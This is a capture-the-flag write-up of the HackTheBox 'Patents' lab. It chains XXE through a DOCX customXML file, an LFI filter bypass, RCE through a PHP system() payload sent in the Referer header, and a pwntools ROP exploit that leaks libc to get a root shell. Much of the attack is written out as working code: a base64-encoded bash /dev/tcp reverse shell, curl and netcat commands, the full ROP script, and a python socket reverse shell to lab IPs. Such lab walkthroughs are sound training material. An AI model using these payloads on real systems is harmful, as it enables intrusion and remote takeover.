🤹 ➗ 🧘🏻 HackTheBox. Passing Patents. XXE via DOCX, LFI to RCE, GIT, and ROP-chain files 🤢 🍄 🕵🏽

I continue to publish solutions sent for further processing from the HackTheBox site .

In this article, we exploit XXE in the service for converting DOCX documents to PDF, get RCE via LFI, dig into the GIT history and restore files, compose ROP chains using pwntools and find a hidden root file.

Connection to the laboratory is via VPN. It is recommended not to connect from a work computer or from a host where the data important to you is available, since you get into a private network with people who know something in the field of information security :)

Organizational Information

, , Telegram . , , .

. , - , .

Recon

This machine has an IP address 10.10.10.173, which I add to / etc / hosts.

10.10.10.173    patents.htb

First, we scan open ports. Since it takes a long time to scan all the ports with nmap, I will first do this with masscan. We scan all TCP and UDP ports from the tun0 interface at a speed of 500 packets per second.

masscan -e tun0 -p1-65535,U:1-65535 10.10.10.173 --rate=500

Now, for more detailed information about the services that operate on ports, we will run a scan with the -A option.

nmap -A patents.htb -p22,80,8888

The host runs SSH services and the Apache web server, with port 8888 reserved for an incomprehensible service. Let's see the web.

The site has a download form for DOCX documents.

XXE DOCX

According to the statement, our document will be converted to PDF format. This suggests the thought of XXE. I took an example from here .

Thus, in this example, the host will try to download the xml document from the remote server. By downloading this document, he will read the local file specified in the downloaded xml document, encode it in base64 and will contact our server again, passing the encoded file as a request parameter. That is, having decoded this parameter, we get the file from the remote machine.

But this load should not be placed on the word / document.xml path. Since the OpenXML SDK is used to work with this type of document, it follows from here and from here, server-side software will search for data in word / document.xml, and in customXML / item1.xml. Therefore, the load should be placed there.

Let's create a docx document and unzip it as a zip archive. After that, create the customXML directory and create the item1.xml file in it. In it we will write the code from the image above, changing the IP address to our own. And we archive the document back.

Now run the local web server.

python3 -m http.server 80

And in the current directory we create the second xml file, specifying / etc / passwd as the desired file.

And upload the document to the server. In the window with the web server running, we will see the reverse connection.

Decode base64 and get the file that was requested.

This way we can read files on the server. Let's read the Apache configuration files. To do this, change dtd.xml and repeat the download of the document.

So we find out the directory in which the site is located. Let's try to read the configuration file.

And the comment says the file was renamed due to vulnerability. We will of course refer to it patents.htb / getPatent_alphav1.0.php .

Turning to this page and passing the path ../../../../../etc/passwd as the id parameter, all occurrences of “../” will be deleted from our line. Let's replace each line “../” with “... /. /”, So when deleting a sequence, “../” will still remain.

And we find LFI.

Entry point

Let's try to get RCE from this. Frankly - it was difficult. The fact is that when sending such a document, we did not receive an offer to download PDF. That is, descriptor 2 was used (to display diagnostic and debug messages in text form). And we can turn to him. Let's encode the reverse shell in base64:

/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.211/4321 0>&1;'

L2Jpbi9iYXNoIC1jICcvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjExLzQzMjEgMD4mMTsn

We will decode it and pass it to the system function in php. Let's pass the code as an HTTP header when uploading a file.

curl http://patents.htb/convert.php -F "userfile=@file.docx" -F 'submit=Generate PDF' --referer 'http://test.com/<?php system(base64_decode("L2Jpbi9iYXNoIC1jICcvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjExLzQzMjEgMD4mMTsn")); ?>'

Run netcat.

nc -lvp 4321

And now let's turn to the second descriptor.

curl http://patents.htb/getPatent_alphav1.0.php?id=....//....//....//....//....//....//....//proc//self//fd//2

We get back connect.

ROOT 1

Load the script system transfers linpeas and carefully analyze the output. So we work in a docker container.

We also find hashes. But hacking, we come to nothing.

Therefore, run pspy64 to track running processes. And we find the start of the process as root, in which the password is passed as an environment variable.

And locally change the user by entering this password.

ROOT 2

Let's see what this script does.

We get a tip on some lfmserver, and also save the username and password. Let's look in the system for everything related to lfm.

And we find the git repository in this directory.

Let's work with this repository.

Let's see the history of changes.

Let's see the history of changes. So we see that in the penultimate commit, an executable file and description were added, and in the last, they were already deleted. Let's roll back before deleting files.

git revert 7c6609240f414a2cb8af00f75fdc7cfbf04755f5

And in our directory an executable file and description appeared.

Here I already wanted to start reversing the file, but - we have a git project! I found a commit that mentioned source codes.

And let's restore the files.

git checkout 0ac7c940010ebb22f7fbedb67ecdf67540728123

After that we download the source codes of interest, the program itself and the libraries to the local machine.

Rop

We need to try to find and exploit the vulnerability in the program, there are source codes to help. Let's check the protection in a binary file.

That is, the canary and PIE are missing, but the stack is not executable. Let's open the binary file in any disassembler with a decompiler convenient for you (I use IDA Pro 7.2) and compare the decompiled code with the source codes from the repository.

To connect to the server and use the data from the checker.py file, as well as credentials.

Let's write an exploit template.

#!/usr/bin/python3

from pwn import *

context(os="linux", arch="amd64")
HOST = "127.0.0.1"
PORT = 8888
username = "lfmserver_user"
password = "!gby0l0r0ck$$!"

Let's now determine the request. Launch the application.

You must send the path to the file and the hash of its contents. For example, I took / etc / hosts.

Add the following code to the template.

INPUTREQ = "CHECK /{} LFM\r\nUser={}\r\nPassword={}\r\n\r\n{}\n"
file = "/etc/hosts"
md5sum = "7d8fc74dc6cc8517a81a5b00b8b9ec32"
send_ = INPUTREQ.format(file,username, password, md5sum)

r = remote(HOST, PORT)
r.sendline(send_.encode())

r.interactive()

Now execute and get the 404 error.

Let's see the log file.

It’s clear where the application is looking for a file, let's play with the paths and specify such a file.

file = "../../../../../etc/hosts"

We will execute the code and we will not see any errors.

But in the case of urlencode, we get a response with code 200 from the server!

file = "%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fhosts"

Great, let's get back to the disassembler. We find among the lines (Shift + F12) a successful server response. And let's see where it is accessed (X).

And we pass to the first function, where at the very beginning there is a verification of credentials.

Let's rename the variable lines in the disassembler window to make it easier to understand in the decompiler.

And parsing the code in lines 18-24, understanding the following: part of the user input falls into the function sub_402DB9, where the string is converted to the variable name, which then falls into the access function, and if the result is negative, the message 404 is output. Thus, the variable name will be the path to the file. Since the request was processed even in urlencode encoding, this function is most likely needed for decoding.

But the fact is that the variable name, where the data is transferred, is of a limited size.

Thus, for buffer overflow, we need to transfer 0xA0 = 160 bytes. Let's add in the code the function of adding up to 160 bytes and encoding the path to the file. Since the hash is calculated from the contents of the file, it is necessary not to violate the integrity of the file path, that is, after the main path add 0x00 bytes.

But the fact is that we need to know the hash from any file on the server, which will always be available and will never change. For example, / proc / sys / kernel / randomize_va_space, and as we recall from the output of linPEAS, ASLR is activated, that is, we know the hash.

Then change the code.

#!/usr/bin/python3
from pwn import *

def append_and_encode(file, rop=b""):
    ret = b""
    path = (file + b"\x00").ljust(160, b"A") + rop
    for i in path:
        ret += b"%" + hex(i)[2:].rjust(2,"0").encode()
    return ret

context(os="linux", arch="amd64", log_level="error")

HOST = "127.0.0.1"
PORT = 8888
INPUTREQ = b"CHECK /{1} LFM\r\nUser=lfmserver_user\r\nPassword=!gby0l0r0ck$$!\r\n\r\n{2}\n"
md5sum = b"26ab0db90d72e28ad0ba1e22ee510510"

payload = append_and_encode(b"../../../../../proc/sys/kernel/randomize_va_space")
send_= INPUTREQ.replace(b"{1}", payload).replace(b"{2}", md5sum)
r = remote(HOST, PORT)
r.sendline(send_)
r.interactive()

It works successfully!

Now let's use a memory leak and determine the address where the libc library is loaded. To do this, we get the address of the write function in the loaded libc library.

binary = ELF("./lfmserver")
libc = ELF("./libc6.so")

rop_binary = ROP(binary)
rop_binary.write(0x6, binary.got['dup2'])
rop = flat(rop_binary.build())

payload = append_and_encode(b"../../../../../proc/sys/kernel/randomize_va_space", rop)

Now select the address of the dup2 function (the first 8 bytes). Subtract the address of the dup2 function in the unloaded library from it. This will find the base address of libc.

print(f"[*] Payload sent")

recv_ = r.recvall().split(b'\r')
leak = u64(recv_[-1][:8])
print(f"[*] Leak address: {hex(leak)}")
libc.address = leak - libc.symbols['dup2']
print(f"[+] Libc base: {hex(libc.address)}")

Now find the address of the line / bin / sh.

shell_address = next(libc.search(b"/bin/sh\x00"))

It remains to collect the ROP, in which the standard I / O descriptors (0,1,2) will be redirected to the descriptor registered in the program (take 6). After which the system function will be called, where we will pass the address of the line / bin / sh.

rop_libc = ROP(libc)
rop_libc.dup2(6,0)
rop_libc.dup2(6,1)
rop_libc.dup2(6,2)
rop_libc.system(shell_address)
rop = flat(rop_libc.build()) 

payload = append_and_encode(b"../../../../../proc/sys/kernel/randomize_va_space", rop)
send_ = INPUTREQ.replace(b"{1}", payload).replace(b"{2}", md5sum)
r = remote(HOST, PORT)
r.sendline(send_)

context.log_level='info'
r.recv()
r.sendline(b"id")

Fine! We get the shell from the root. But he is quickly dying. Run the listener (nc -lvp 8765) and throw the back connect shell.

r.sendline(b'python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.66",8765));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\'')

And we have a stable shell. I give the full code in the picture below.

But we can’t read the root flag ...

ROOT 3

By running linpeas and looking at the output, we find interesting sections, especially / dev / sda2.

Let's get information about all the block devices.

Thus we have the root partition / dev / sda2. Create a directory and mount the partition.

So we find the root flag.

You can join us on Telegram . There you can find interesting materials, merged courses, as well as software. Let's put together a community in which there will be people who are versed in many areas of IT, then we can always help each other on any IT and information security issues.

HackTheBox. Passing Patents. XXE via DOCX, LFI to RCE, GIT, and ROP-chain files